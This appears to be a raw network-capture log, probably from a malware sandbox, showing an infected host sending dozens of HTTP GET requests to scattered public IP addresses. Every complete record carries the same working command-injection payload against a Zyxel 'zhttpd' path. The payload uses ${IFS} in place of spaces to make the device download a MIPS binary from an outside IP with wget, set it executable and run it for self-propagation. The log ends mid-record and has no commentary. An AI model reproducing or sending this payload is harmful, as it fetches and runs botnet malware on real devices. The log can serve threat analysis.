                                      7886192.168.2.1448440143.221.174.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067424059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7887192.168.2.1433432166.121.98.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067467928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7888192.168.2.1448524203.51.195.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067538023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7889192.168.2.14416768.185.72.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067626953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7890192.168.2.1458390205.31.124.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067631006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7891192.168.2.1456448216.84.192.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067676067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7892192.168.2.1434256117.202.246.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067698956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7893192.168.2.1452622216.196.208.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067738056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7894192.168.2.1435122154.234.95.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067789078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7895192.168.2.143627083.92.104.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067816019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7896192.168.2.144552483.148.216.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067868948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7897192.168.2.1451216209.101.94.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067893028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7898192.168.2.144563860.33.102.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067933083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7899192.168.2.144959014.40.35.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.067981958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7900192.168.2.1438604148.180.241.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068006039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7901192.168.2.145870851.200.107.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068022013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7902192.168.2.1437498190.145.94.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068054914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7903192.168.2.1458954135.253.40.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068083048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7904192.168.2.145313074.246.19.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068109989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7905192.168.2.144006839.153.50.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068317890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7906192.168.2.145297499.24.172.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068320990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7907192.168.2.144072013.163.84.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068352938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7908192.168.2.1433618101.162.111.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068376064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7909192.168.2.144322835.18.254.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068444967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7910192.168.2.1448370218.52.165.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068460941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7911192.168.2.145819627.208.221.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068507910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7912192.168.2.1460638128.87.239.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068526030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7913192.168.2.145221249.219.118.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068576097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7914192.168.2.1447844151.232.30.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068612099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7915192.168.2.1450608207.181.168.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068640947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7916192.168.2.1442880159.80.7.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068670988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7917192.168.2.145715478.156.91.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068737030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7918192.168.2.1438366164.56.38.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068778038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7919192.168.2.1442144105.158.74.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068816900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7920192.168.2.1452374187.118.196.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068825006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7921192.168.2.145620234.207.22.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068847895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7922192.168.2.1440162195.223.194.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068901062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7923192.168.2.144887037.43.27.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068934917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7924192.168.2.144700237.17.251.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068958044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7925192.168.2.1460674115.192.187.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.068991899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7926192.168.2.145465060.18.152.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069046021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7927192.168.2.1453084168.123.43.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069081068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7928192.168.2.146095497.219.38.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069116116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7929192.168.2.144552478.27.59.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069190979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7930192.168.2.145477499.235.192.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069222927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7931192.168.2.145817454.152.41.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069236994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7932192.168.2.145954260.170.67.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069287062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7933192.168.2.1449442110.83.4.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069330931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7934192.168.2.143870066.109.172.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069377899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7935192.168.2.144571845.228.100.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069396973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7936192.168.2.1437900223.228.90.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069484949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7937192.168.2.1448780149.79.127.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069494009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7938192.168.2.1454452143.84.253.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069502115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7939192.168.2.1457430136.101.176.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069544077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7940192.168.2.145463025.87.255.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069634914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7941192.168.2.1449896135.159.161.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069652081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7942192.168.2.1439364189.95.132.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069722891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7943192.168.2.1450368220.171.105.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069766045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7944192.168.2.145847253.91.8.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069783926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7945192.168.2.144943276.62.90.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069833994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7946192.168.2.1444478220.239.5.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069879055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7947192.168.2.1457454151.58.218.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069895983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7948192.168.2.1434322208.15.86.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069953918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7949192.168.2.1452004173.114.11.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.069978952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7950192.168.2.1433940169.249.55.210443
                                      TimestampBytes transferredDirectionData
